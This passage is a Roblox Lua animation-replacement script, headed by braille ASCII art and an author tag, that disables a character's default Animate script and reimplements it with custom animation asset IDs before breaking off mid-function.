⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⠜⢡⠊⠀⠀⠀⠀⠀⠀⠀⣰⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⡀⠰⡄⠀⠹⡄⠀⠀⠀⠳⡄⠐⠁⠀⠀⢀⠔⠉⠀⠀⠈⢆⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀ ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⡠⠋⡔⠁⠀⠀⠀⠀⠀⠀⠀⣰⡏⠀⠀⠀⠀⠀⠀⠀⠀⠀⣷⠀⠀⠀⠀⠀⠀⠀⠀⣷⠀⠀⠹⡄⠀⠀⠀⠈⢷⣀⡠⠚⠁⠀⠀⢀⠄⠢⡀⠣⣀⠀⠀⠀⢀⣀⣤⣤⣄⠀⠀⠀⠀⠀ ⠀⠀⠀⠀⠀⠀⠀⢀⡄⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⡰⢁⠎⠀⠀⠀⠀⠀⠀⠀⠀⢰⢹⠀⠀⠀⠀⠀⠀⠀⠀⠀⡄⣹⡄⠀⠀⠀⠀⠀⠀⠀⡇⡆⠀⠀⢳⠀⠀⠀⠀⠈⠙⢵⠀⠀⢀⠕⢁⠖⡠⠁⠀⠉⡖⠚⠉⠩⢿⡟⣿⣭⣷⣄⠀⠀⠀ ⠀⠀⠀⠀⠀⠀⠀⡘⠘⡄⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⡘⢡⠃⠀⠀⠀⠀⠀⠀⠀⠀⠀⡆⡎⡘⠀⠀⠀⠀⠀⠀⠀⠀⠀⣜⢣⠀⠀⠀⠀⠀⠀⠀⢹⠸⡀⠀⠐⢇⠀⠀⠀⠀⠀⠀⠑⢶⡁⠀⢸⡔⠁⠀⢠⠃⢁⠀⠀⠀⠒⣿⡽⣶⢾⣿⣷⣄⠀ ⠀⠀⠀⠀⠀⠀⢰⠇⠀⠸⡄⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢰⢣⠇⡄⠀⠀⠀⠀⠀⠀⠀⠀⢸⢠⠇⠇⠀⠀⠀⠀⠀⠀⠀⠀⠀⢸⢸⠀⠀⠀⠀⠀⠀⠀⠸⠀⡇⠀⠀⠸⡆⠀⠀⠀⠀⠀⠀⠘⢿⣦⣾⠀⠀⠀⡇⠀⢸⠀⠀⠀⠀⢸⣿⣷⣿⡿⣿⣿⣧ ⠀⠀⠀⠀⠀⠀⢎⠀⠀⠀⡷⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢠⠃⡌⡘⠀⠀⠀⠀⠀⠀⠀⠀⠀⡸⢸⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢸⠀⡇⠀⠀⠄⠀⠀⠀⠀⡇⢸⠀⠀⠀⢳⠀⠀⠀⠀⠀⠀⠀⠀⠹⣴⠀⠀⡜⠀⠀⢘⣲⣄⣀⣈⣸⠿⢿⣯⣿⣽⣞⣿ ⠀⠀⠀⠀⠀⠀⠀⢣⠀⡴⠁⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⠏⡸⢠⠁⠀⠀⠀⠀⠀⠀⠀⠀⠀⡇⡸⢰⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢸⡀⡇⠀⠀⠀⠀⠀⠀⠀⢸⠈⡇⠀⠀⠈⢇⠀⠀⠀⠀⠀⠀⠀⠀⠸⠓⣜⠂⠀⣴⣿⣿⣷⣾⣯⣿⣦⠈⠉⠛⠻⠞⠉ ⠀⠀⠀⠀⠀⠀⠀⠀⠙⠁⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢸⣄⡇⢜⡀⠤⣀⠀⠀⠀⠀⠀⠀⠀⡇⢓⠨⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢸⡀⣇⠀⠀⠀⠀⠀⠀⠀⠈⡆⢥⠀⠀⠀⠘⡆⠀⠀⠀⠀⠀⠀⠀⠨⠀⠀⠓⢦⢿⣿⣿⣾⣷⣿⣿⡿⠀⠀⠀⠀⠀⠀ ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠘⠦⣀⠈⠑⠀⠦⠤⠄⠀⠀⠀⠀⣇⣽⠀⠀⠄⠀⠀⠀⠀⠀⠀⠒⠈⢸⠂⡏⠀⠠⠀⠀⠀⠀⠐⠀⠇⢸⠄⣀⣀⠀⠘⡄⠀⠀⠀⠀⠀⠀⠈⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀ ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠉⠒⣶⠤⠤⠤⠤⠤⠶⠖⠛⠉⠲⠤⣄⣀⣀⣀⢀⣀⣀⣤⣤⣼⣿⣧⣈⠉⠐⠒⠂⠀⠀⠀⢸⡻⠦⠤⣤⠤⠖⠋⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀ ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣹⡀⠀⢠⣀⣤⠴⠖⠛⠋⠉⠉⠉⣩⡥⠬⠥⣬⣉⣹⡏⠉⠉⠉⠉⠉⠉⠒⠒⠒⠚⠿⠥⢤⣀⡀⡏⠀⠀⠀⠀⠀⠀⠀⠀⠀⠐⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀ ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠩⡗⠚⠉⣀⠠⠤⠒⠒⠀⠀⠀⠉⠀⠀⠀⠀⠀⠀⠀⡇⠀⠀⠉⠉⠉⠉⠁⠉⠁⠀⠀⠀⠒⠤⢩⠇⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠄⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀ ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢳⠈⠁⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⡇⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠸⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀ ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠸⡄⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠂⠀⡇⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⡗⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀ ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢳⠐⠂⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⡇⠀⠀⠀⠀⠐⠀⠀⠀⠀⠀⠀⠀⠀⢰⠃⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣤⠀⠀⠀⠀⠀⠀⠀⠀ ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠈⣆⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠐⢀⡇⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢸⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣰⠉⡄⠀⠀⠀⠀⠀⠀⠀ ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢠⠛⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠇⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠠⠠⡟⡆⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣰⠃⠀⠘⡄⠀⠀⠀⠀⠀⠀ ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣰⠋⢸⢧⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣀⡀⢨⡇⠀⠀⠀⠀⠐⠀⠀⠀⠀⠀⠀⠀⢈⡰⢯⠁⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠰⡇⠀⠀⠀⢹⠀⠀⠀⠀⠀⠀ ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣀⠴⠋⠀⢀⣸⣄⠇⠈⠢⢄⠀⠀⠀⠀⠀⠀⠀⠀⠠⠁⢸⢧⠀⠀⠀⠀⠀⠀⡀⠀⠀⢀⠔⠁⠊⠁⠈⢣⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠐⡄⠀⣠⠋⠀⠀⠀⠀⠀⠀ ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠠⠀⠀⢠⡤⠖⠋⠁⠀⠀⠠⢀⡿⠉⠙⠢⠤⠀⣉⠒⠤⣀⠀⠀⠀⠀⠀⠀⡿⢸⡀⠀⠀⠀⠀⠀⡀⠠⢖⠍⠀⠀⠀⠀⠀⠀⠻⡄⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠘⣤⠃⠀⠀⠀⠀⠀⠀⠀ ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⣀⠤⠓⠋⠀⠀⠀⡀⠤⠀⠂⣠⠞⠀⠀⠀⠀⠀⠀⠀⠉⠀⠀⠁⠀⠀⠀⠀⢠⠇⣈⣇⠀⠀⠀⠀⠁⠀⠀⠀⠀⠀⠀⢀⠠⠂⠀⡄⠹⡀⠀⠀⠀⠀⠂⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀ ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⡠⠖⠋⠀⠀⠀⠀⠀⠈⢀⠀⠠⠐⡴⢡⠂⠁⠂⠤⣤⣀⠀⠀⠀⠈⠢⠀⠀⠀⠀⠀⡼⠀⣼⢹⡀⠀⠀⠀⠀⢀⡠⠤⠏⠁⠀⠀⠀⠀⠀⣰⠀⢷⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀ ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣠⠔⠋⠀⠀⠀⠀⠀⠀⡀⠁⠀⠂⠀⠄⡜⢀⠂⠀⠀⠀⠀⠀⠀⠀⠀⠉⠂⠲⡄⠤⠀⢠⡼⠁⢀⡟⠀⣧⠐⠒⠒⠽⠋⠁⠀⠀⠀⠀⡠⠤⠎⠁⠁⠀⠸⡀⠀⠀⠀⡀⠀⡠⠊⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀ ⠀⠀⠀⠀⠀⠀⠀⠀⢠⠞⠁⠀⠀⠀⠀⠀⠀⠀⠄⠀⡀⠁⢀⠂⡸⠀⠀⠈⠒⢤⡀⠀⠀⠀⠀⠀⠀⠀⢠⠃⠀⢀⡾⠁⣾⣸⠁⠀⡟⡆⠀⠀⡠⠖⠒⠚⠉⠉⠀⠀⠀⠀⠀⠀⠀⢀⡇⠀⠀⠀⢀⠝⠁⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀ ⠀⠀⠀⠀⠀⠀⠀⡴⠁⠀⠀⠀⠀⠀⠀⠀⠀⠄⠀⠀⠀⠐⠀⠀⡇⠀⠀⠀⠀⠀⠀⠀⠉⠓⠢⢤⣀⢠⣃⣀⢀⡞⢁⡼⠛⠃⠀⣱⠁⢻⠈⠁⠁⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⡠⠒⠀⡇⠀⠀⡠⠋⠈⠀⠀⢀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀ ⠀⠀⠀⠀⠀⢠⣎⣠⡶⠗⠀⠀⠀⠀⠀⠀⠄⠀⠀⠀⠁⠠⠈⢰⡇⠉⠂⢄⡀⠀⠀⠀⠀⠀⠀⠀⢁⠂⠀⢀⡟⠠⠞⠀⠠⡄⣱⠃⠀⠈⣇⣀⣀⡤⠆⠂⠂⠂⠂⠒⠉⠁⠁⠀⠀⠀⡇⢀⠎⠀⠀⠀⠀⠀⠁⠀⢠⢦⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀ ⠀⠀⠀⠀⠀⢚⣷⡾⠁⠀⠀⠀⠀⠀⠀⢀⠀⠀⠁⠠⠈⠀⠄⢸⣇⠀⠀⠀⠀⠁⠂⠠⢀⠀⠀⠀⠎⠀⢀⡞⠀⠠⠀⠂⣽⣻⠃⠀⠀⠀⠘⣆⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⡀⡠⠚⠀⣧⠀⠀⠀⠀⠀⠀⠀⠀⢠⠃⠀⢣⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀ ⠀⠀⠀⠀⣠⢾⣿⠇⠀⠀⠀⠀⠀⠀⢀⠀⠀⠈⠀⠄⠐⠀⠠⢸⠁⠑⠤⢀⣀⠀⠀⠀⠀⠀⠀⠉⠀⢀⡏⠀⠐⠀⣡⢾⡟⠁⠀⠀⠀⠀⠀⠻⡄⠀⠀⠀⠀⣀⡤⠔⠋⠉⠀⠀⠀⠀⡟⠀⠀⠀⠀⠀⠀⠀⠀⠘⡄⢠⠎⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀ ⠀⠀⠀⣰⠃⣯⢾⠀⢀⣴⡟⠀⠀⠀⠀⡀⠈⠀⠄⠀⠂⠈⢀⢸⠀⠀⠀⠀⠀⠀⠁⠑⠢⣀⡀⠀⢠⠟⠀⣈⣤⠞⠁⠈⠀⠀⠀⠀⠀⠀⠀⠀⢳⠐⠒⠊⠉⠀⠀⠀⠀⠀⠀⠀⢀⠀⡇⠀⠀⠀⠀⠀⠀⠀⠀⠀⠈⠁⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀ ⠀⠀⣰⠃⠀⣷⣿⣴⣟⡿⠁⠀⠀⣀⣁⠀⠀⠐⠀⡈⠀⢁⠀⣼⠄⣀⠀⠀⠀⠀⠀⠀⠀⠀⠈⢳⣎⣠⠖⠋⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠈⢧⠀⠀⠀⠀⢀⣀⣀⡀⠤⠂⠁⢠⠃⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀ ⠀⢠⠃⠀⠀⠉⢁⣼⡿⢶⣞⡿⣿⣿⡏⠀⠈⡀⠐⠀⢈⠀⣼⢹⠦⠀⠁⠂⠤⣀⠀⠀⠀⠀⠀⡾⠉⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠚⣏⠁⠉⠉⠀⠀⠀⠀⠀⠀⠀⣸⠄⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀ ⠀⡞⠀⠀⠀⠀⠞⠛⠛⠉⢁⣿⡿⣿⠁⣀⡐⢂⠄⢈⡆⢠⠇⣼⠀⠀⠀⠀⠀⠀⠀⠉⠐⠀⡼⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠸⡄⠀⠀⠀⠀⠀⣀⡤⠄⠊⠹⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀ ⢰⠁⠀⠀⠀⠀⠀⠀⠀⠀⠈⣿⣿⣿⣼⡟⠁⢃⣤⣿⣷⠋⠐⣿⠈⠁⠀⠀⠀⠀⠀⠀⠀⡸⠁⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢹⡒⠋⠉⠉⠉⠁⠀⠀⠀⢀⡇⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀ ⣾⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠘⡿⢋⣿⢁⣴⣾⣿⣿⣟⣠⠟⡏⠀⠀⠀⠀⠀⠀⠀⠀⢠⠃⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢣⠀⠀⠀⠀⠀⠀⢀⡀⠠⡇⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀ ⡏⠀⠀⡀⠀⠀⠀⠀⠀⠀⠀⠀⡰⠘⣯⣼⣿⠟⣿⣿⠟⠁⣸⠁⠒⠠⢀⡀⠀⠠⠈⢀⠇⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⣸⡧⠖⠒⠒⠁⠉⠁⠀⠀⢻⠄⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀ ⣧⠀⣴⡇⠀⢰⠀⠀⠀⢀⠀⡜⠀⠀⠹⡏⢁⣴⠛⠁⠀⢠⠇⠀⠀⠀⠀⠀⠜⠁⠀⡜⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠰⣧⢹⣒⣒⠶⠶⢦⡤⠝⠛⣇⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀ ⢹⠞⢠⡁⠀⢷⠀⠀⢀⠎⠸⠀⠀⠀⢀⣴⠋⠁⠀⠀⢀⠏⠈⠉⠀⠀⢀⣀⠀⠤⠐⢧⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⡼⠀⠀⠀⠀⠀⠀⠀⠀⠀⠈⢆⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀ ⠀⠈⠸⡇⠀⠈⠆⢀⠇⠀⠁⠀⣼⢠⡞⡁⠀⠀⠀⢀⠏⠀⠀⠀⠚⠛⠂⠀⠀⠀⢀⡞⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⡇⣀⠀⠀⢀⣀⣀⣀⣀⠠⠄⣾⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀ ⠀⠀⠀⠹⡄⠀⠈⠚⠂⠀⠀⣴⣿⡎⠀⠀⠀⠀⠀⡞⠀⠀⠐⠒⠐⠀⠀⠀⠀⠈⠀⢧⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⠧⠀⠀⠀⠀⠀⠀⠀⠀⠀⡂⢹⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀ ⠀⠀⠀⠀⠙⢄⠀⠀⠀⠀⠀⡇⠈⠀⠀⠀⠀⠀⠈⢳⠀⠀⠀⠀⢀⠀⠀⠤⠄⠒⠂⠨⣇⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣸⠈⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢹⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀ ⠀⠀⠀⠀⠀⠀⠙⠢⢤⣀⡀⢳⢀⣀⣠⠤⠤⠤⠤⠬⡇⠒⠈⠉⠀⠀⠀⠀⠀⠀⢀⠀⠘⣆⢀⣀⠀⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢠⠇⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⡎⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀ ⠀⠀⠀⠀⠀⠀⠀⣠⠤⠂⠈⠙⠁⡀⠄⢂⠐⡀⠆⠐⣻⠀⠀⢀⡀⠄⠐⠂⠉⢀⣀⣀⣠⣼⣦⣤⣂⠐⠐⡈⠐⢂⠁⠒⠠⢁⠂⠌⢉⠑⢦⠀⣠⠤⠴⠾⢲⠶⠶⠤⠤⢤⣀⣀⠒⠀⠤⠀⡇⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀ ⠀⠀⠀⠀⠀⠀⠀⠳⠤⣌⣌⣠⠁⡐⠈⠄⢂⠐⡈⠄⣹⡖⠀⣀⣠⣦⣶⣿⣿⣭⣽⣶⣷⣽⣶⣬⣭⡳⣥⠀⠡⠀⠌⠠⢁⠂⠌⡀⠂⠌⢀⣾⣥⣶⣶⣿⣿⢿⡿⣿⣿⣿⣿⣮⣽⣿⣶⣄⡇⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀ ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⡤⠌⠐⡀⢂⠐⠠⢈⣷⣿⣿⣿⣟⡿⣽⣻⣿⣟⡷⣯⣟⣿⣿⣟⣿⣿⠇⠠⢁⠈⡐⠠⠈⠄⠠⢁⠂⣼⣿⣯⣷⣻⣿⣽⢯⣟⣷⣿⣟⣾⣽⣻⣟⡿⣿⡧⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀ ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠘⠦⣌⡐⢀⠂⡈⠐⡀⠻⣿⣿⣿⣾⣿⣿⣽⣯⣿⣟⣷⣿⣾⣿⣿⣿⡿⠀⡁⠂⡐⠠⠁⠌⠠⠁⠂⠄⡈⢿⣿⣿⣿⣿⣿⣿⣿⣾⣿⣿⣾⣷⣿⣾⣿⣿⠃⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀ ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠈⠉⠑⠒⠃⠐⠤⠀⠙⠛⠿⠿⣿⣿⣿⣿⠿⠿⠟⠛⢋⠉⡀⠄⢂⠐⠠⠐⠠⠁⠌⠠⠁⠌⠠⠐⡀⠈⠉⠛⠛⠟⠻⠟⠟⠻⠛⠛⠛⠛⠉⠉⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀ ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠂⠀⠒⠐⠒⠂⠂⠂⠑⠀⠃⠈⠀⠃⠈⠀⠁⠀⠁⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀ Invisible_#3657 was here OwO ]]-- local plr = game:GetService("Players").LocalPlayer function RunCustomAnimation(Char) if Char:WaitForChild("Animate") ~= nil then Char.Animate.Disabled = true end Char:WaitForChild("Humanoid") for i,v in next, Char.Humanoid:GetPlayingAnimationTracks() do v:Stop() end --fake script local script = Char.Animate local Character = Char local Humanoid = Character:WaitForChild("Humanoid") local pose = "Standing" local UserGameSettings = UserSettings():GetService("UserGameSettings") local userNoUpdateOnLoopSuccess, userNoUpdateOnLoopValue = pcall(function() return UserSettings():IsUserFeatureEnabled("UserNoUpdateOnLoop") end) local userNoUpdateOnLoop = userNoUpdateOnLoopSuccess and userNoUpdateOnLoopValue local AnimationSpeedDampeningObject = script:FindFirstChild("ScaleDampeningPercent") local HumanoidHipHeight = 2 local humanoidSpeed = 0 -- speed most recently sent to us from onRunning() local cachedRunningSpeed = 0 -- The most recent speed used to compute blends. Tiny variations from cachedRunningSpeed will not cause animation updates. local cachedLocalDirection = {x=0.0, y=0.0} -- unit 2D object space direction of motion local smallButNotZero = 0.0001 -- We want weights to be small but not so small the animation stops local runBlendtime = 0.2 local lastLookVector = Vector3.new(0.0, 0.0, 0.0) -- used to track whether rootPart orientation is changing. local lastBlendTime = 0 -- The last time we blended velocities local WALK_SPEED = 6.4 local RUN_SPEED = 12.8 local EMOTE_TRANSITION_TIME = 0.1 local currentAnim = "" local currentAnimInstance = nil local currentAnimTrack = nil local currentAnimKeyframeHandler = nil local currentAnimSpeed = 1.0 local PreloadedAnims = {} local animTable = {} local animNames = { idle = { { id = "http://www.roblox.com/asset/?id=12521158637", weight = 9 }, { id = "http://www.roblox.com/asset/?id=12521162526", weight = 1 }, }, walk = { { id = "http://www.roblox.com/asset/?id=12518152696", weight = 10 } }, run = { { id = "http://www.roblox.com/asset/?id=12518152696", weight = 10 } }, jump = { { id = "http://www.roblox.com/asset/?id=12520880485", weight = 10 } }, fall = { { id = "http://www.roblox.com/asset/?id=12520972571", weight = 10 } }, climb = { { id = "http://www.roblox.com/asset/?id=12520982150", weight = 10 } }, sit = { { id = "http://www.roblox.com/asset/?id=12520993168", weight = 10 } }, toolnone = { { id = "http://www.roblox.com/asset/?id=12520996634", weight = 10 } }, toolslash = { { id = "http://www.roblox.com/asset/?id=12520999032", weight = 10 } }, toollunge = { { id = "http://www.roblox.com/asset/?id=12521002003", weight = 10 } }, wave = { { id = "http://www.roblox.com/asset/?id=12521004586", weight = 10 } }, point = { { id = "http://www.roblox.com/asset/?id=12521007694", weight = 10 } }, dance = { { id = "http://www.roblox.com/asset/?id=12521009666", weight = 10 }, { id = "http://www.roblox.com/asset/?id=12521151637", weight = 10 }, { id = "http://www.roblox.com/asset/?id=12521015053", weight = 10 } }, dance2 = { { id = "http://www.roblox.com/asset/?id=12521169800", weight = 10 }, { id = "http://www.roblox.com/asset/?id=12521173533", weight = 10 }, { id = "http://www.roblox.com/asset/?id=12521027874", weight = 10 } }, dance3 = { { id = "http://www.roblox.com/asset/?id=12521178362", weight = 10 }, { id = "http://www.roblox.com/asset/?id=12521181508", weight = 10 }, { id = "http://www.roblox.com/asset/?id=12521184133", weight = 10 } }, laugh = { { id = "http://www.roblox.com/asset/?id=12521018724", weight = 10 } }, cheer = { { id = "http://www.roblox.com/asset/?id=12521021991", weight = 10 } }, } local strafingLocomotionMap = {} local fallbackLocomotionMap = {} local locomotionMap = strafingLocomotionMap -- Existance in this list signifies that it is an emote, the value indicates if it is a looping emote local emoteNames = { wave = false, point = false, dance = true, dance2 = true, dance3 = true, laugh = false, cheer = false} math.randomseed(tick()) function findExistingAnimationInSet(set, anim) if set == nil or anim == nil then return 0 end for idx = 1, set.count, 1 do if set[idx].anim.AnimationId == anim.AnimationId then return idx end end return 0 end function configureAnimationSet(name, fileList) if (animTable[name] ~= nil) then for _, connection in pairs(animTable[name].connections) do connection:disconnect() end end animTable[name] = {} animTable[name].count = 0 animTable[name].totalWeight = 0 animTable[name].connections = {} -- uncomment this section to allow players to load with their -- own (non-classic) animations --[[ local config = script:FindFirstChild(name) if (config ~= nil) then table.insert(animTable[name].connections, 